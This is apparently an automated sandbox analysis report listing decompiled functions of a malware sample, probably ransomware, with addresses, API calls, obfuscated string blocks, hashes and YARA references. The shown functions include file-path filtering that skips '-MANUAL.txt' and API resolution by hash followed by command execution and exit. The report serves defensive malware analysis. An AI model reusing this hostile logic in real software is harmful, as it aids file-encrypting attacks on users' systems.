				short _v66;
				char _v67;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				short _v86;
				intOrPtr _v90;
				char _v91;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				short _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char _v176;
				char _v177;
				intOrPtr _v181;
				intOrPtr _v185;
				intOrPtr _v189;
				intOrPtr _v193;
				intOrPtr _v197;
				char _v198;
				short _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				char _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				char _v272;
				intOrPtr _v278;
				char _v279;
				char _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				char _v293;
				short _v295;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				char _v324;
				short _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char _v376;
				short _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				char _v428;
				char _v431;
				short _v433;
				intOrPtr _v437;
				intOrPtr _v441;
				intOrPtr _v445;
				intOrPtr _v449;
				intOrPtr _v453;
				char _v454;
				short _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				char _v480;
				short _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				char _v536;
				int _t162;
				int _t163;
				void* _t165;
				signed int _t202;
				void* _t206;
				char _t207;
				WCHAR* _t213;
				WCHAR* _t215;

				_t213 = _a4;
				_t162 = lstrlenW(_t213);
				_t163 = lstrlenW(_t213);
				_t215 =  &(_t213[_t163 - 1]);
				_t165 = 0x5c;
				_t206 = _t162 - 1;
				if(_t206 == 0) {
					L3:
					_t207 = 0x5c;
					_v224 = 0x49bb3284;
					_t216 =  &(_t215[1]);
					_v220 = 0x3546009a;
					_v216 = 0x5d1872f3;
					_v212 = 0x23c7af08;
					_v208 = 0x9023cefa;
					_v204 = 0x9023cee2;
					_v200 = 0x4800;
					_v198 = _t207;
					_v197 = 0x749217a0;
					_v193 = 0x998b63dc;
					_v189 = 0x81be9752;
					_v185 = 0x6168a11d;
					_v181 = 0x2915f784;
					_v177 = 0xe7;
					if(E00401AC8( &(_t215[1]), E00407563( &_v224)) != 0) {
						_v272 = 0x570d5a0a;
						_v268 = 0xfcec7058;
						_v264 = 0xbe7a48cd;
						_v260 = 0xa73627eb;
						_v256 = 0x9047a30a;
						_v252 = 0x9047a312;
						_v248 = 0xb7e5a67e;
						_v244 = 0x229fa4f7;
						_v240 = 0xadad9eb0;
						_v236 = 0xb971f5b5;
						_v232 = 0x765a4b02;
						_v228 = 0xb0249b43;
						if(E00401AC8(_t216, E00407563( &_v272)) == 0) {
							goto L4;
						}
						_v176 = 0xce05fb72;
						_v172 = 0x42acc94;
						_v168 = 0xf803d919;
						_v164 = 0x6a84e8e9;
						_v160 = 0xcbe1f684;
						_v156 = 0xcbe1f692;
						_v152 = 0x5f8d16ff;
						_v148 = 0xdb24f4ff;
						_v144 = 0x919f9226;
						_v140 = 0x91814ae7;
						_v136 = 0xbeec26ed;
						_v132 = 0xb5c2;
						if(E00401AC8(_t216, E00407563( &_v176)) == 0) {
							goto L4;
						}
						_v324 = 0x2d09bc0a;
						_v320 = 0xcce40369;
						_v316 = 0x9773939c;
						_v312 = 0x85470836;
						_v308 = 0x4809fece;
						_v304 = 0x4809fed4;
						_v300 = 0xb0af849d;
						_v296 = _t207;
						_v295 = 0x9ef7;
						_v293 = _t207;
						_v292 = 0x53ffe746;
						_v288 = 0xbeed9f63;
						_v284 = 0x9738d494;
						_v280 = 0xbf;
						_v279 = _t207;
						_v278 = 0xfa4a9219;
						if(E00401AC8(_t216, E00407563( &_v324)) == 0) {
							goto L4;
						}
						_v376 = 0x58460ee8;
						_v372 = 0xdc738fff;
						_v368 = 0x753e312f;
						_v364 = 0x9e7cd77d;
						_v360 = 0x6511157f;
						_v356 = 0x65111565;
						_v352 = 0x1c593bdb;
						_v348 = 0xb447efb8;
						_v344 = 0x662adeff;
						_v340 = 0x6c8418d2;
						_v336 = 0x2473369c;
						_v332 = 0xa834bc44;
						_v328 = 0xe7ae;
						if(E00401AC8(_t216, E00407563( &_v376)) == 0) {
							goto L4;
						}
						_v84 = 0x1765c324;
						_v80 = 0x414e5ab2;
						_v76 = 0xe9448ddf;
						_v72 = 0xfcbc6a97;
						_v68 = 0xe5;
						_v67 = _t207;
						_v66 = 0x7b8d;
						_v64 = 0xf7;
						_v63 = _t207;
						_v62 = 0xb4607b8d;
						_v58 = 0x933dfe54;
						_v54 = 0x79ee9d77;
						_v50 = 0xf2259b68;
						_v46 = 0xfd;
						_v45 = _t207;
						_v44 = 0x5e1;
						if(E00401AC8(_t216, E00407563( &_v84)) == 0) {
							goto L4;
						}
						_v536 = 0x1c00bfd9;
						_v532 = 0xe1b9f6d3;
						_v528 = 0xd41318d7;
						_v524 = 0xc551fa82;
						_v520 = 0x2d83eaf4;
						_v516 = 0x2d83eaea;
						_v512 = 0x1f3353a8;
						_v508 = 0x8b8bea41;
						_v504 = 0x203db7f2;
						_v500 = 0x3c35cb7d;
						_v496 = 0x8cdf23ba;
						_v492 = 0x790a2b8c;
						_v488 = 0xa2e47ec3;
						_v484 = 0x4e1b;
						if(E00401AC8(_t216, E00407563( &_v536)) == 0) {
							goto L4;
						}
						_v128 = 0x389766f5;
						_v124 = 0xf2c5f02e;
						_v120 = 0xf67118bd;
						_v116 = 0xae83fbfd;
						_v112 = 0x8a43652e;
						_v108 = 0x8a43653a;
						_v104 = 0x7b1bce25;
						_v100 = 0x1e510fcb;
						_v96 = 0xec44f088;
						_v92 = 0xde;
						_v91 = 1;
						_v90 = 0x17fc172d;
						_v86 = 0x7934;
						if(E00401AC8(_t216, E00407563( &_v128)) != 0) {
							if(E0040C552(_t216, L"-MANUAL.txt") != 0) {
								goto L12;
							}
							_v40 = 0x47586063;
							_v36 = 0x68f54475;
							_v32 = 0x9ce021a6;
							_v28 = 0xc6563bf9;
							_v24 = 0xeae3fd34;
							_v20 = 0xeae3fd38;
							_v16 = 0x34ec396b;
							_v12 = 0xe70bea45;
							_v8 = 0x71f47c63;
							if(E00401AC8(_t216, E00407563( &_v40)) == 0) {
								goto L12;
							}
							_v428 = 0x14241426;
							_v424 = 0xf70ea3f5;
							_v420 = 0xb6cc4cab;
							_v416 = 0xc97acb34;
							_v412 = 0x2b56c53;
							_v408 = 0x2b56c49;
							_v404 = 0xdd532ed5;
							_v400 = 0x7ad48ce7;
							_v396 = 0x37b8a70a;
							_v392 = 0xc75710d1;
							_v388 = 0xe79ebc2a;
							_v384 = 0xb2b2dbd2;
							_v380 = 0x643d;
							if(E00401AC8(_t216, E00407563( &_v428)) == 0) {
								goto L12;
							}
							_v480 = 0xfecccc7c;
							_v476 = 0xd9f79e2d;
							_v472 = 0x42b390de;
							_v468 = 0xabd8f10b;
							_v464 = 0x83d90818;
							_v460 = 0x83d90802;
							_v456 = 0xb428;
							_v454 = 1;
							_v453 = 0x208e8c7a;
							_v449 = 0x638e1f0f;
							_v445 = 0x3fe30d1a;
							_v441 = 0xda75532a;
							_v437 = 0x797348c8;
							_v433 = 0x5a53;
							_v431 = 0xec;
							_t202 = E00401AC8(_t216, E00407563( &_v480));
							asm("sbb eax, eax");
							return  ~_t202 + 1;
						}
						L12:
						return 1;
					}
					L4:
					return 1;
				} else {
					goto L1;
				}
				do {
					L1:
					_t215 = _t215 - 2;
					_t206 = _t206 - 1;
				} while ( *_t215 != _t165 && _t206 != 0);
				goto L3;
			}

0x00408404
0x00408408
0x0040840d
0x00408412
0x00408415
0x00408416
0x00408419
0x00408428
0x0040842a
0x00408431
0x0040843c
0x0040843f
0x00408449
0x00408453
0x0040845d
0x00408467
0x00408471
0x0040847a
0x00408480
0x0040848a
0x00408494
0x0040849e
0x004084a8
0x004084b2
0x004084ca
0x004084da
0x004084e5
0x004084ef
0x004084f9
0x00408503
0x0040850d
0x00408517
0x00408521
0x0040852b
0x00408535
0x0040853f
0x00408549
0x00408564
0x00000000
0x00000000
0x00408570
0x0040857b
0x00408585
0x0040858f
0x00408599
0x004085a3
0x004085ad
0x004085b7
0x004085c1
0x004085cb
0x004085d5
0x004085df
0x004085f6
0x00000000
0x00000000
0x00408602
0x0040860d
0x00408617
0x00408621
0x0040862b
0x00408635
0x0040863f
0x00408649
0x0040864f
0x00408658
0x0040865e
0x00408668
0x00408672
0x0040867c
0x00408683
0x00408689
0x004086a4
0x00000000
0x00000000
0x004086b0
0x004086bb
0x004086c5
0x004086cf
0x004086d9
0x004086e3
0x004086ed
0x004086f7
0x00408701
0x0040870b
0x00408715
0x0040871f
0x00408729
0x00408743
0x00000000
0x00000000
0x0040874c
0x00408754
0x0040875b
0x00408762
0x00408769
0x0040876d
0x00408770
0x00408776
0x0040877a
0x0040877d
0x00408784
0x0040878b
0x00408792
0x00408799
0x0040879d
0x004087a0
0x004087b7
0x00000000
0x00000000
0x004087c3
0x004087ce
0x004087d8
0x004087e2
0x004087ec
0x004087f6
0x00408800
0x0040880a
0x00408814
0x0040881e
0x00408828
0x00408832
0x0040883c
0x00408846
0x00408860
0x00000000
0x00000000
0x00408868
0x00408872
0x0040887a
0x00408882
0x00408889
0x00408890
0x00408897
0x0040889e
0x004088a5
0x004088ac
0x004088b0
0x004088b3
0x004088ba
0x004088d1
0x004088e9
0x00000000
0x00000000
0x004088ee
0x004088f6
0x004088fd
0x00408904
0x0040890b
0x00408912
0x00408919
0x00408920
0x00408927
0x0040893f
0x00000000
0x00000000
0x00408947
0x00408952
0x0040895c
0x00408966
0x00408970
0x0040897a
0x00408984
0x0040898e
0x00408998
0x004089a2
0x004089ac
0x004089b6
0x004089c0
0x004089da
0x00000000
0x00000000
0x004089e6
0x004089f1
0x004089fb
0x00408a05
0x00408a0f
0x00408a19
0x00408a23
0x00408a2c
0x00408a32
0x00408a3c
0x00408a46
0x00408a50
0x00408a5a
0x00408a64
0x00408a6d
0x00408a7b
0x00408a85
0x00000000
0x00408a87
0x004088d3
0x00000000
0x004088d3
0x004084cc
0x00000000
0x00000000
0x00000000
0x00000000
0x0040841b
0x0040841b
0x0040841b
0x0040841e
0x0040841f
0x00000000

APIs

lstrlenW.KERNEL32(00408115,00000000,00000010,00000000), ref: 00408408
lstrlenW.KERNEL32(00408115), ref: 0040840D

Strings

4y, xrefs: 004088BA
-MANUAL.txt, xrefs: 004088DA
c`XG, xrefs: 004088EE
/1>u, xrefs: 004086C5
ZW, xrefs: 004084DA
k94, xrefs: 00408919
SZ, xrefs: 00408A64
=d, xrefs: 004089C0

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: lstrlen
String ID: ZW$-MANUAL.txt$/1>u$4y$=d$SZ$c`XG$k94
API String ID: 1659193697-2411568412
Opcode ID: 634b353821b7996bb00c895616893c24d4e25f67ed1aa37b265aa1569427edc8
Instruction ID: fe07f046ba13c2374b71879ea43760352e21e05f499b3fafaaa9a41fc7b1a16d
Opcode Fuzzy Hash: 634b353821b7996bb00c895616893c24d4e25f67ed1aa37b265aa1569427edc8
Instruction Fuzzy Hash: 58E135B0C0536D9ADB20DF659D81BDEBB74BF12300F5041EAD8587A351DB384A85CFAA

Uniqueness

Uniqueness Score: 100.00%

Function 00425095, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00425095(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x43d7d0;
				if(_t67 != 0x43d7d0) {
					E004214E2(_t67);
					_t36 = _a4;
				}
				E004214E2( *((intOrPtr*)(_t36 + 0x3c)));
				E004214E2( *((intOrPtr*)(_a4 + 0x30)));
				E004214E2( *((intOrPtr*)(_a4 + 0x34)));
				E004214E2( *((intOrPtr*)(_a4 + 0x38)));
				E004214E2( *((intOrPtr*)(_a4 + 0x28)));
				E004214E2( *((intOrPtr*)(_a4 + 0x2c)));
				E004214E2( *((intOrPtr*)(_a4 + 0x40)));
				E004214E2( *((intOrPtr*)(_a4 + 0x44)));
				E004214E2( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00424EDD(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00424F3E(_t71, _t75);
			}

0x00425095
0x0042509a
0x004250a0
0x004250a2
0x004250a8
0x004250ab
0x004250b0
0x004250b3
0x004250b7
0x004250c2
0x004250cd
0x004250d8
0x004250e3
0x004250ee
0x004250f9
0x00425104
0x00425112
0x0042511d
0x00425125
0x00425126
0x00425129
0x0042512f
0x00425133
0x00425137
0x00425138
0x00425142
0x00425148
0x00425149
0x0042514c
0x00425152
0x00425156
0x0042515a
0x00425163

APIs

_free.LIBCMT ref: 004250AB
_free.LIBCMT ref: 004250B7

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 004250C2
_free.LIBCMT ref: 004250CD
_free.LIBCMT ref: 004250D8
_free.LIBCMT ref: 004250E3
_free.LIBCMT ref: 004250EE
_free.LIBCMT ref: 004250F9
_free.LIBCMT ref: 00425104
_free.LIBCMT ref: 00425112

Part of subcall function 00424EDD: _free.LIBCMT ref: 00424F18

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: da4d38f4d1e08aadf85c2b2aebfea5a8112a7e5511c6f0741d9dbfbff314dd61
Instruction ID: 14a4e21fe4ec9ad732467558a4ce867876e946f8f3953a4d331f23f89bf88169
Opcode Fuzzy Hash: da4d38f4d1e08aadf85c2b2aebfea5a8112a7e5511c6f0741d9dbfbff314dd61
Instruction Fuzzy Hash: 6721E976A00118AFCB11EFD5D981DDE7BB8FF18304F5041AAF9099B521EB35EA54CB84

Uniqueness

Uniqueness Score: 0.14%

Function 00425095, Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004250AB
_free.LIBCMT ref: 004250B7

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 004250C2
_free.LIBCMT ref: 004250CD
_free.LIBCMT ref: 004250D8
_free.LIBCMT ref: 004250E3
_free.LIBCMT ref: 004250EE
_free.LIBCMT ref: 004250F9
_free.LIBCMT ref: 00425104
_free.LIBCMT ref: 00425112

Part of subcall function 00424EDD: _free.LIBCMT ref: 00424F18

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a545430504c47659086043c1170fa878f1957a90004671859da1e81370fa21f0
Instruction ID: 14a4e21fe4ec9ad732467558a4ce867876e946f8f3953a4d331f23f89bf88169
Opcode Fuzzy Hash: a545430504c47659086043c1170fa878f1957a90004671859da1e81370fa21f0
Instruction Fuzzy Hash: 6721E976A00118AFCB11EFD5D981DDE7BB8FF18304F5041AAF9099B521EB35EA54CB84

Uniqueness

Uniqueness Score: 0.14%

Function 00405157, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 104
memoryUNIQUE

Download Yara Rule

C-Code - Quality: 77%

			E00405157() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				short _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr* _t48;
				void* _t54;
				void* _t56;
				intOrPtr* _t57;
				WCHAR* _t60;
				void* _t64;

				_t64 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t60 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t64 != 0) {
					_t48 = E004010BB(_t60, 1, 0x774393fe);
					 *_t48(0, _t64, 0x200);
					if(_t60 != 0) {
						_v172 = 0xb464de44;
						_v168 = 0x17d8d7cd;
						_v164 = 0x315042e4;
						_v160 = 0xdc656869;
						_v156 = 0x67e340ef;
						_v152 = 0x67e340ad;
						_v148 = 0x1c70bb9d;
						_v144 = 0x18737478;
						_v140 = 0x181af5b;
						_v136 = 0x120f9e93;
						_v132 = 0xf48bba5f;
						_v128 = 0xda4a2acd;
						_v124 = 0x3397c25f;
						_v120 = 0x819543d6;
						_v116 = 0x872acd64;
						_v112 = 0xc61bb639;
						_v108 = 0xc10a6e2d;
						_v104 = 0x7bbbba09;
						_v100 = 0xdf7c1437;
						_v96 = 0x6601ab50;
						_v92 = 0x44bb77f;
						_v88 = 0xa2475da4;
						_v84 = 0xd083;
						wsprintfW(_t60, E00407563( &_v172), _t64);
						_v40 = 0xbb6b59ed;
						_v36 = 0x98473d0c;
						_v32 = 0xb610703d;
						_v28 = 0x9edaaa7;
						_v24 = 0x302028fb;
						_v20 = 0x302028f1;
						_v16 = 0x7d40d68e;
						_v12 = 0x52b42f8d;
						_v8 = 0x9a15;
						_t54 = E00407563( &_v40);
						_v80 = 0xad368468;
						_v76 = 0xed186656;
						_v72 = 0x78ea2b44;
						_v68 = 0x531ee5c5;
						_v64 = 0x6447b041;
						_v60 = 0x6447b051;
						_v56 = 0x64eeea6d;
						_v52 = 0x89cf6a49;
						_v48 = 0x5edfab40;
						_v44 = 0x89a0ff7d;
						_t56 = E00407563( &_v80);
						_t57 = E004010BB(_t60, 4, 0x570bc88f);
						 *_t57(0, _t54, _t56, _t60, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x00405184
0x00405188
0x0040518c
0x00405199
0x004051a8
0x004051ac
0x004051b8
0x004051c3
0x004051cd
0x004051d7
0x004051e1
0x004051eb
0x004051f5
0x004051ff
0x00405209
0x00405213
0x0040521d
0x00405224
0x0040522b
0x00405232
0x00405239
0x00405240
0x00405247
0x0040524e
0x00405255
0x0040525c
0x00405263
0x0040526a
0x00405271
0x0040527f
0x00405288
0x00405290
0x00405297
0x0040529e
0x004052a5
0x004052ac
0x004052b3
0x004052ba
0x004052c1
0x004052c7
0x004052ce
0x004052d8
0x004052e0
0x004052e7
0x004052ee
0x004052f5
0x004052fc
0x00405303
0x0040530a
0x00405311
0x00405318
0x00405326
0x00405336
0x00405336
0x004051ac
0x0040533a

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00405178
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00405186
ExitProcess.KERNEL32 ref: 0040533A

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

wsprintfW.USER32 ref: 0040527F

Strings

BP1, xrefs: 004051CD
D+x, xrefs: 004052E0
@g, xrefs: 004051E1
md, xrefs: 004052FC

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AllocVirtual$ExitLibraryLoadProcesswsprintf
String ID: D+x$md$@g$BP1
API String ID: 1988241487-1407499195
Opcode ID: 47e849d2c32c0e7447aa29c52e492b16d20882df808d41fdf594a8801bfd7975
Instruction ID: 43e044f4e86fb6718cc7fbb134379fb9daab2b1a9142dd25b60e2d4630d3465f
Opcode Fuzzy Hash: 47e849d2c32c0e7447aa29c52e492b16d20882df808d41fdf594a8801bfd7975
Instruction Fuzzy Hash: D64126B0D00358AEEB20DFD1C986BDEBE78EF05744F204169E6287B281DB755A41CF65

Uniqueness

Uniqueness Score: 100.00%

Function 00403A70, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
UNIQUE

Download Yara Rule

C-Code - Quality: 85%

			E00403A70(void* __ebx, void* __edx, void* __edi, void* __ebp, signed int* _a4) {
				char* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v76;
				char* _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t88;
				void* _t95;
				void* _t102;
				signed int _t105;
				void* _t116;
				signed int _t121;
				signed int _t122;
				void* _t127;
				signed int _t132;
				signed int _t133;
				void* _t138;
				signed int _t143;
				signed int _t144;
				intOrPtr _t146;
				signed int _t148;
				signed int _t150;
				signed int* _t156;
				signed int* _t159;
				signed int* _t162;
				unsigned int _t164;
				signed int _t167;
				void* _t180;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				intOrPtr* _t195;
				signed int _t197;
				signed int _t199;
				signed int* _t201;
				signed int* _t210;
				intOrPtr _t212;
				intOrPtr _t214;
				void* _t219;
				void* _t220;
				void* _t222;
				void* _t223;
				void* _t225;
				void* _t226;
				void* _t228;
				void* _t234;

				_t180 = __edx;
				_t220 = _t219 - 0x18;
				E0041339D( &_v16, 0);
				_t185 =  *0x44d468; // 0x1
				_t146 =  *0x44c800; // 0x290de8
				_v28 = _t146;
				if(_t185 == 0) {
					E0041339D( &_v20, _t185);
					_t234 =  *0x44d468 - _t185; // 0x1
					if(_t234 == 0) {
						_t143 =  *0x44d448; // 0x2
						_t144 = _t143 + 1;
						 *0x44d448 = _t144;
						 *0x44d468 = _t144;
					}
					E004133F5( &_v20);
					_t185 =  *0x44d468; // 0x1
				}
				_t210 = _a4;
				_t156 = _a4;
				if(_t185 >=  *((intOrPtr*)(_t156 + 0xc))) {
					_t195 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t195 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 8)) + _t185 * 4));
					if(_t195 != 0) {
						L16:
						E004133F5( &_v16);
						return _t195;
					} else {
						L8:
						if( *((char*)(_t156 + 0x14)) == 0) {
							L11:
							if(_t195 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t138 = E00413DB2();
							if(_t185 >=  *((intOrPtr*)(_t138 + 0xc))) {
								L12:
								if(_t146 == 0) {
									_t88 = E004099F0(_t180,  &_v24, _t210);
									_t222 = _t220 + 8;
									__eflags = _t88 - 0xffffffff;
									if(__eflags == 0) {
										asm("xorps xmm0, xmm0");
										_v12 = 0x4375b4;
										asm("movq [esp+0x24], xmm0");
										_v8 = "bad cast";
										E00416C8D( &_v12, 0x446bf8);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t223 = _t222 - 0x18;
										_push(_t146);
										_push(_t210);
										_push(_t195);
										_push(_t185);
										E0041339D( &_v56, 0);
										_t187 =  *0x44c7f4; // 0x0
										_t148 =  *0x44c814; // 0x0
										_v68 = _t148;
										__eflags = _t187;
										if(_t187 == 0) {
											E0041339D( &_v60, _t187);
											__eflags =  *0x44c7f4 - _t187; // 0x0
											if(__eflags == 0) {
												_t132 =  *0x44d448; // 0x2
												_t133 = _t132 + 1;
												__eflags = _t133;
												 *0x44d448 = _t133;
												 *0x44c7f4 = _t133;
											}
											E004133F5( &_v60);
											_t187 =  *0x44c7f4; // 0x0
										}
										_t212 = _v36;
										_t159 = _a4;
										__eflags = _t187 -  *((intOrPtr*)(_t159 + 0xc));
										if(_t187 >=  *((intOrPtr*)(_t159 + 0xc))) {
											_t197 = 0;
											__eflags = 0;
											goto L26;
										} else {
											_t197 =  *( *((intOrPtr*)(_t159 + 8)) + _t187 * 4);
											__eflags = _t197;
											if(_t197 != 0) {
												L34:
												E004133F5( &_v56);
												return _t197;
											} else {
												L26:
												__eflags =  *((char*)(_t159 + 0x14));
												if( *((char*)(_t159 + 0x14)) == 0) {
													L29:
													__eflags = _t197;
													if(_t197 != 0) {
														goto L34;
													} else {
														goto L30;
													}
												} else {
													_t127 = E00413DB2();
													__eflags = _t187 -  *((intOrPtr*)(_t127 + 0xc));
													if(_t187 >=  *((intOrPtr*)(_t127 + 0xc))) {
														L30:
														__eflags = _t148;
														if(_t148 == 0) {
															_t95 = E00409A80(_t180,  &_v64, _t212);
															_t225 = _t223 + 8;
															__eflags = _t95 - 0xffffffff;
															if(__eflags == 0) {
																asm("xorps xmm0, xmm0");
																_v52 = 0x4375b4;
																asm("movq [esp+0x24], xmm0");
																_v48 = "bad cast";
																E00416C8D( &_v52, 0x446bf8);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_t226 = _t225 - 0x18;
																_push(_t148);
																_push(_t212);
																_push(_t197);
																_push(_t187);
																E0041339D( &_v96, 0);
																_t189 =  *0x44c7f8; // 0x0
																_t150 =  *0x44c818; // 0x0
																_v108 = _t150;
																__eflags = _t189;
																if(_t189 == 0) {
																	E0041339D( &_v100, _t189);
																	__eflags =  *0x44c7f8 - _t189; // 0x0
																	if(__eflags == 0) {
																		_t121 =  *0x44d448; // 0x2
																		_t122 = _t121 + 1;
																		__eflags = _t122;
																		 *0x44d448 = _t122;
																		 *0x44c7f8 = _t122;
																	}
																	E004133F5( &_v100);
																	_t189 =  *0x44c7f8; // 0x0
																}
																_t214 = _v76;
																_t162 = _a4;
																__eflags = _t189 - _t162[3];
																if(_t189 >= _t162[3]) {
																	_t199 = 0;
																	__eflags = 0;
																	goto L44;
																} else {
																	_t199 =  *(_t162[2] + _t189 * 4);
																	__eflags = _t199;
																	if(_t199 != 0) {
																		L52:
																		E004133F5( &_v96);
																		return _t199;
																	} else {
																		L44:
																		__eflags = _t162[5];
																		if(_t162[5] == 0) {
																			L47:
																			__eflags = _t199;
																			if(_t199 != 0) {
																				goto L52;
																			} else {
																				goto L48;
																			}
																		} else {
																			_t116 = E00413DB2();
																			__eflags = _t189 -  *((intOrPtr*)(_t116 + 0xc));
																			if(_t189 >=  *((intOrPtr*)(_t116 + 0xc))) {
																				L48:
																				__eflags = _t150;
																				if(_t150 == 0) {
																					_t102 = E00409B00(_t180,  &_v104, _t214);
																					_t228 = _t226 + 8;
																					__eflags = _t102 - 0xffffffff;
																					if(__eflags == 0) {
																						asm("xorps xmm0, xmm0");
																						_v92 = 0x4375b4;
																						asm("movq [esp+0x24], xmm0");
